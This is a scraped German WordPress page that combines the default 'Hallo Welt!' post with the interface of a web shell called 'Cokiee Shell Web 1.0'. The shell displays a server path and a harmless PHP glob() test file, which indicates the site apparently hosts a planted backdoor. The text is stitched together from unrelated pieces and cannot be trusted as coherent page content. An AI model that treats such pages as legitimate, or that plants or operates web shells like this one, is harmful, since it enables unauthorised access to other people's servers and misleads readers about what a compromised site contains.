Willkommen bei WordPress. Dies ist dein erster Beitrag. Bearbeite oder lösche ihn und beginne mit dem Schreiben!
Hallo Welt!
von raredesign | Dez 3, 2019 | Allgemein | 0 Kommentare
Cokiee Shell
Current Path : /usr/local/src/php7/php-7.0.5/ext/standard/tests/file/ |
Current File : //usr/local/src/php7/php-7.0.5/ext/standard/tests/file/glob_error_002-win32.phpt |
--TEST-- Test glob() function: error condition - pattern too long. --CREDITS-- Dave Kelsey <d_kelsey@uk.ibm.com> --SKIPIF-- <?php if(substr(PHP_OS, 0, 3) != "WIN") die("skip Only valid for Windows"); ?> --FILE-- <?php /* Prototype: array glob ( string $pattern [, int $flags] ); Description: Find pathnames matching a pattern */ echo "*** Testing glob() : error condition - pattern too long. ***\n"; var_dump(glob(str_repeat('x', 3000))); echo "Done"; ?> --EXPECTF-- *** Testing glob() : error condition - pattern too long. *** Warning: glob(): Pattern exceeds the maximum allowed length of %d characters in %s on line %d bool(false) Done
Cokiee Shell Web 1.0, Coded By Razor
Neueste Kommentare